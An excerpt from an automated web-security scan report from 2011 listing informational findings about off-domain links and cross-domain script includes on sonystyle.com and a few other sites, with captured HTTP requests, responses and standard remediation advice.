<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<h4 class="sectionHeader"><a href="http://green.sel.sony.com/index.html" target="_blank" class="redArrowLink">Recycling Program</a>
...[SNIP]...
<h4 class="sectionHeader"><a href="http://esupport.sony.com/" target="_blank" class="redArrowLink">Online Product Support</a>
...[SNIP]...
<h4 class="sectionHeader"><a href="http://esupport.sony.com/US/perl/contact-land.pl" target="_blank" class="redArrowLink">Contact Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast & Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

10.9. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay?langId=-1&storeId=10151&catalogId=10551

The response contains the following links to other domains:

http://ebookstore.sony.com/
http://esupport.sony.com/US/perl/contact-relation.pl?
http://esupport.sony.com/US/perl/index.pl
http://esupport.sony.com/US/perl/model-accessories.pl
http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT
http://nexus2.ensighten.com/sony/Bootstrap.js
http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/
http://products.sel.sony.com/SEL/legal/privacy.html
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.sony.com/
http://www.sony.net/
http://www.sonycreativesoftware.com/
http://www.twitter.com/sonyoutletusa
http://www.youtube.com/user/sonyelectronics
https://forum.sel.sony.com/
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

Response

HTTP/1.1 200 OK
ntCoent-Length: 73360
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=gKhUalwoDI2z%2bNprXZ4zIKFzImo%3d%0a%3b2011%2d06%2d23+11%3a19%3a57%2e352%5f1308841107995%2d82466%5f10151%5f241903390%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:57 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903390=241903390%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG4oMGqREaYXQdgrhlLJv3qbvnxtslAf5G4pPtDsUOINJCueV5cMMwxhx5ni8RjGeSOa%0asInl12kMoEjmCmyUzHwfxteaIruGewQaiLBIDV0gTI%2bF6NR9bXRaayEonpmxIhImeBdp%2fZ1DQQ%3d%3d; Path=/
Set-Cookie: TS5bbf46=8cda39d87185f14d1bf971f120ead6895e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e6ced6c50a378910e; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 73360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast & Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

10.10. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551

The response contains the following links to other domains:

http://ebookstore.sony.com/
http://esupport.sony.com/US/perl/contact-relation.pl?
http://esupport.sony.com/US/perl/index.pl
http://esupport.sony.com/US/perl/model-accessories.pl
http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT
http://nexus2.ensighten.com/sony/Bootstrap.js
http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/
http://products.sel.sony.com/SEL/legal/privacy.html
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.sony.com/
http://www.sony.net/
http://www.sonycreativesoftware.com/
http://www.twitter.com/sonyoutletusa
http://www.youtube.com/user/sonyelectronics
https://forum.sel.sony.com/
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480

Response

HTTP/1.1 200 OK
ntCoent-Length: 93671
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 93671
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:08 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast & Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

10.11. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The page was loaded from a URL containing a query string:

https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport

The response contains the following links to other domains:

https://forum.sel.sony.com/
https://nexus2.ensighten.com/sony/Bootstrap.js
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/CRMPortalHome?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 78597
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:28 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Content-Length: 78597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

10.12. https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.websitealive5.com
Path:	/4405/operator/guest/gDefault_v2.asp

Issue detail

The page was loaded from a URL containing a query string:

https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=

The response contains the following link to another domain:

https://images.websitealive.com/images/hosted/upload/9106.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:16:28 GMT
Content-Length: 15042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<a href="http://www.omnitechsupport.com" target="_blank"><img src="https://images.websitealive.com/images/hosted/upload/9106.gif" style="margin-top:10px; margin-bottom:20px; margin-left:25px;border:none;"></a>
...[SNIP]...

11. Cross-domain script include previous next
There are 20 instances of this issue:

http://script.aculo.us/
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.huddletogether.com/projects/lightbox2/
http://www.omnitechsupport.com/about.php
http://www.omnitechsupport.com/spyware_removal.php
http://www.opensource.org/licenses/mit-license.php
http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay
http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView
http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay
http://www.sonystyle.com/webapp/wcs/stores/servlet/SearchCatalog
http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

11.1. http://script.aculo.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://script.aculo.us
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.getclicky.com/js

Request

GET / HTTP/1.1
Host: script.aculo.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 23 Jun 2011 15:19:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.7
Content-Length: 13458

<!DOCTYPE html>
<html>
<head>
<title>script.aculo.us - web 2.0 javascript</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<link rel="alternate" type="application/rs
...[SNIP]...
</center>

<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...

11.2. http://twitter.com/sonyoutletusa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sonyoutletusa

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1308769086/javascripts/dismissable.js?1308259132
http://a0.twimg.com/a/1308769086/javascripts/twitter.js?1308259133
http://a2.twimg.com/a/1308769086/javascripts/api.js?1308259132
http://a2.twimg.com/a/1308769086/javascripts/geov1.js?1308259132
